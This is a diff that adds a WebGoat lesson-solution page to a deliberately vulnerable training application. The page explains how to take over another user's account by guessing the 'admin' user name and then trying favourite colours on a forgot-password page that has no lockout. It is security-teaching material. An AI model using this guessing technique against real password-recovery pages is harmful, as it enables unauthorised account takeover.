+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:Wingdings;
+	panose-1:5 0 0 0 0 0 0 0 0 0;
+	mso-font-charset:2;
+	mso-generic-font-family:auto;
+	mso-font-pitch:variable;
+	mso-font-signature:0 268435456 0 0 -2147483648 0;}
+@font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Exploit the Forgot Password Page<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Web
+applications frequently provide their users the ability to retrieve a forgotten
+password. Unfortunately, many web applications fail to implement the mechanism
+properly. The information required to verify the identity of the user is often
+overly simplistic. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Users can
+retrieve their password if they can answer the secret question properly. There
+is no lock-out mechanism on this 'Forgot Password' page. Your username is
+'webgoat' and your favorite color is 'red'. The goal is to retrieve the
+password of another user.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+will show you how easy it is to guess a secret question and retrieve somebody
+else his password.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_477" o:spid="_x0000_i1031" type="#_x0000_t75"
+ style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image015.jpg" v:shapes="Picture_x0020_477"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 10</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>When you
+enter the user name webgoat and then the answer “red” for your favorite color,
+you will get a password reminder, only not via e-mail.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_478"
+ o:spid="_x0000_i1030" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image016.jpg" v:shapes="Picture_x0020_478"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Submit the answer red<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_479"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image017.jpg" v:shapes="Picture_x0020_479"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Password reminder for user webgoat</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The password
+for user webgoat is webgoat. This is a weak password policy, which is also a
+bad thing </span><span style='font-family:Wingdings;mso-ascii-font-family:Arial;
+mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;
+mso-symbol-font-family:Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:
+Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
+to guess the password for another user. The text tells you something about an
+“OWASP admin”. So let’s try “admin” for a user name.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_480"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image018.jpg" v:shapes="Picture_x0020_480"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Is there a user admin?<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This works.
+Now you need the guess some colors.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_481"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image019.jpg" v:shapes="Picture_x0020_481"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> There is a user admin!<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try blue, red
+and green for example.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_482"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image020.jpg" v:shapes="Picture_x0020_482"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> No blue</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Blue is an
+incorrect response.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_483"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image013.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/ForgotPassword_files/image021.jpg" v:shapes="Picture_x0020_483"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>7</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> It's green!</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Green is the
+correct answer and now you know the difficult password for user admin.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<span style='font-size:12.0pt;font-family:"Times New Roman","serif";mso-fareast-font-family:
+"Times New Roman";mso-ansi-language:EN-US;mso-fareast-language:EN-US;
+mso-bidi-language:AR-SA'><br clear=all style='mso-special-character:line-break;
+page-break-before:always'>
+</span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/ForgotPassword_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ForgotPassword_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/filelist.xml b/main/project/WebContent/lesson_solutions/ForgotPassword_files/filelist.xml
new file mode 100644
index 000000000..ec8ce5b70
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ForgotPassword_files/filelist.xml
@@ -0,0 +1,20 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../ForgotPassword.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image016.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image018.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image019.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image020.jpg"/>
+ <o:File HRef="image013.png"/>
+ <o:File HRef="image021.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image001.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image001.png
new file mode 100644
index 000000000..3e10c76d3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image003.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image003.png
